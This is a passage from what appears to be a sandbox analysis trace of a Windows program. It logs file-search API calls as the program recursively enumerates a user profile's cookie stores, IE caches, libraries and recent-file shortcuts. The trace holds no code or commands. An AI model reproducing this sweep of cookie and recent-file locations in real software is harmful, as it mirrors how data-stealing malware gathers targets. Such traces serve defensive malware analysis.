returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*" [0083.627] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.627] PathMatchSpecW (pszFile="CUSTOM.DIC", pszSpec="*") returned 1 [0083.627] PathMatchSpecW (pszFile="ExcludeDictionaryEN0409.lex", pszSpec="*") returned 1 [0083.628] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.628] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Windows" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows" [0083.628] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*" [0083.628] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.628] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Cookies" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies" [0083.628] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*" [0083.628] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.628] PathMatchSpecW (pszFile="aetadzjz@g.live[1].txt", pszSpec="*") returned 1 [0083.628] PathMatchSpecW (pszFile="aetadzjz@google[2].txt", pszSpec="*") returned 1 [0083.628] PathMatchSpecW (pszFile="aetadzjz@live[1].txt", pszSpec="*") returned 1 [0083.628] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.628] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low" [0083.628] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*" [0083.628] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.629] PathMatchSpecW (pszFile="aetadzjz@ad.360yield[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@ad13.adfarm1.adition[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@addthis[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@adfarm1.adition[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@adformdsp[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@adform[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@adnxs[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@adscale[1].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@adserving.ancoraplatform[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@adsrvr[1].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@adtech[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@advertising[1].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@angsrvr[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@api.bing[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@at.atwola[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@bidswitch[1].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@bing[1].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@bluekai[1].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@bs.serving-sys[1].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@bs.serving-sys[3].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@c.bing[1].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@c.msn[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@c1.microsoft[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@casalemedia[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@connextra[2].txt", pszSpec="*") returned 1 [0083.629] PathMatchSpecW (pszFile="aetadzjz@crwdcntrl[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@demdex[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@doubleclick[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@dpm.demdex[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@exelator[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@eyeota[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@google[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@ibeu2.mookie1[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@ih.adscale[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@linkedin[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@m.exactag[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@mathtag[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@microsoft[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@msn[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@openx[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@pixel.rubiconproject[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@pubmatic[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@rubiconproject[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@scorecardresearch[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@semasio[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@server.adformdsp[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@serving-sys[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@serving.experianmarketingservices[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@smartadserver[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@tapad[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@track.adform[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@turn[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@w55c[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@www.bing[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@www.linkedin[1].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="aetadzjz@www.msn[2].txt", pszSpec="*") returned 1 [0083.630] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.630] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.631] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.631] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="IECompatCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache" [0083.631] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*" [0083.631] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.631] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low" [0083.631] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*" [0083.631] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.631] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.631] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.631] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="IETldCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache" [0083.631] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*" [0083.631] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.632] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.632] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low" [0083.632] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*" [0083.632] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.632] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.632] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.632] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.632] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Libraries" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries" [0083.632] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0083.632] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.632] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.632] PathMatchSpecW (pszFile="Documents.library-ms", pszSpec="*") returned 1 [0083.632] PathMatchSpecW (pszFile="Music.library-ms", pszSpec="*") returned 1 [0083.632] PathMatchSpecW (pszFile="Pictures.library-ms", pszSpec="*") returned 1 [0083.632] PathMatchSpecW (pszFile="Videos.library-ms", pszSpec="*") returned 1 [0083.632] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.632] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Network Shortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts" [0083.632] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0083.632] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.632] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.632] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Printer Shortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts" [0083.633] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0083.633] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.633] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.633] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="PrivacIE" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE" [0083.633] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*" [0083.633] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.633] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.633] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low" [0083.633] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*" [0083.633] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.633] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.633] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.633] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.633] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.633] PathMatchSpecW (pszFile="-30A.lnk", pszSpec="*") returned 1 [0083.633] PathMatchSpecW (pszFile="-K1l.lnk", pszSpec="*") returned 1 [0083.633] PathMatchSpecW (pszFile="-m__HyY.flv.lnk", pszSpec="*") returned 1 [0083.633] PathMatchSpecW (pszFile="0bDrkJM8XXXnFRxfDg.lnk", pszSpec="*") returned 1 [0083.633] PathMatchSpecW (pszFile="0DNjPat.lnk", pszSpec="*") returned 1 [0083.633] PathMatchSpecW (pszFile="2Nixhtrz2gmyV.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="2w0hahW-zduMFuM.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="3iTBagJh1TzGAF.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="3why64Tae9g8c4VdM8du.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="4GnnIG6RdLOiij.mkv.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="4K6vEar.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="4QH68b0VZVmVea.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="4zHejp QLa ZE2pa cH.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="5mCV5OJINb0by_M.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="66JSU-GMFXebztL6ygQU.mkv.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="6s KHOwEGy9S7Ui.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="6ZmZ0xKozu28.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="6zu4TtZ9V.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="7BO3.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="7HjWJR_LGMvzxmbh11.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="8bX-DpXHK5F2Jt08OT.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="8DKSg5L.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="8IX078BF_yA.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="8W9SovSulzKgG_lNSllO.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="9rKKEdWHzAr2h.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="9sVjW_9SxQBpOlFRynwd.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="9XjB ynfFlmJrlu8uy.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="A2W4hWIo9JNOPgMLEbON.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="A3eTpG3yiuj.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="Ab9hH.mkv.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="AmGzCyfE3UJ.lnk", pszSpec="*") returned 1 [0083.634] PathMatchSpecW (pszFile="AtpEIf_3ro-.lnk", pszSpec="*") returned 1 [0083.634] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.635] PathMatchSpecW (pszFile="1b4dd67f29cb1962.automaticDestinations-ms", pszSpec="*") returned 1 [0083.635] PathMatchSpecW (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*") returned 1 [0083.635] PathMatchSpecW (pszFile="9b9cdc69c1c24e2b.automaticDestinations-ms", pszSpec="*") returned 1 [0083.635] PathMatchSpecW (pszFile="eb282ead62b4db87.automaticDestinations-ms", pszSpec="*") returned 1 [0083.635] PathMatchSpecW (pszFile="fb3b0dbfee58fac8.automaticDestinations-ms", pszSpec="*") returned 1 [0083.635] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.635] PathMatchSpecW (pszFile="B4honwPP90ft9NBJsJ.flv.lnk", pszSpec="*") returned 1 [0083.635] PathMatchSpecW (pszFile="BDa5B4GVrREPMxye24.lnk", pszSpec="*") returned 1 [0083.635] PathMatchSpecW (pszFile="BQbMQWsA.lnk", pszSpec="*") returned 1 [0083.635] PathMatchSpecW (pszFile="bwFwGum5_tu.lnk", pszSpec="*") returned 1 [0083.635] PathMatchSpecW (pszFile="cDuwllOG1a13fdUSRtyT.lnk", pszSpec="*") returned 1 [0083.636] PathMatchSpecW (pszFile="CJ3VRj.lnk", pszSpec="*") returned 1 [0083.636] PathMatchSpecW (pszFile="CNyryAkAB.lnk", pszSpec="*") returned 1 [0083.636] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.636] PathMatchSpecW (pszFile="1b4dd67f29cb1962.customDestinations-ms", pszSpec="*") returned 1 [0083.636] PathMatchSpecW (pszFile="590aee7bdd69b59b.customDestinations-ms", pszSpec="*") returned 1 [0083.636] PathMatchSpecW (pszFile="5afe4de1b92fc382.customDestinations-ms", pszSpec="*") returned 1 [0083.636] PathMatchSpecW (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*") returned 1 [0083.636] PathMatchSpecW (pszFile="969252ce11249fdd.customDestinations-ms", pszSpec="*") returned 1 [0083.636] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.637] PathMatchSpecW (pszFile="Cwm2k.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="Ea27DuZ.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="eo9uwSYwbQ8w-H9nZNH.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="f9Kz7FajrZe1D3cJu.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="f9qMY.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="fekn9-cYjXE.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="fI8HtTYnLk.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="fvW2_oNzD WbqiCr-MPh.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="fWYvTfhZ8pDF fugPxx.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="fyH-uEyk.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="GerI56Fqfwp_.mkv.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="GfolyaPf5e_.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="GniRADlcdXM4e2NV8Q9.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="gSeMslrV-UMnw.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="GWgVhSNyFu dKu.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="gXiF8Ie492m0IXBb.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="hW8kL.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="HxDmDA2.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="i5O0_LIU2IZEasfZ7kGw.ots.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="IjwM7q33.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="iOIPdOtfzh B E9C.mkv.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="ItqxY4z Y 4rVAHIrmZY.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="jzyu_DZ Ndc.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="k-_w4gLllVwoL83pf.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="k9t4FeIHN.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="kAq1- 39jYRD61eR-q W.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="kBFP3Db2Q.lnk", pszSpec="*") returned 1 [0083.637] PathMatchSpecW (pszFile="L s6Njtmvi.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW (pszFile="LmPLyJ2Ow.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW (pszFile="m3h5tfwIa0qf.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW (pszFile="mctbo0q.flv.lnk", pszSpec="*") returned 1 [0083.638] PathMatchSpecW 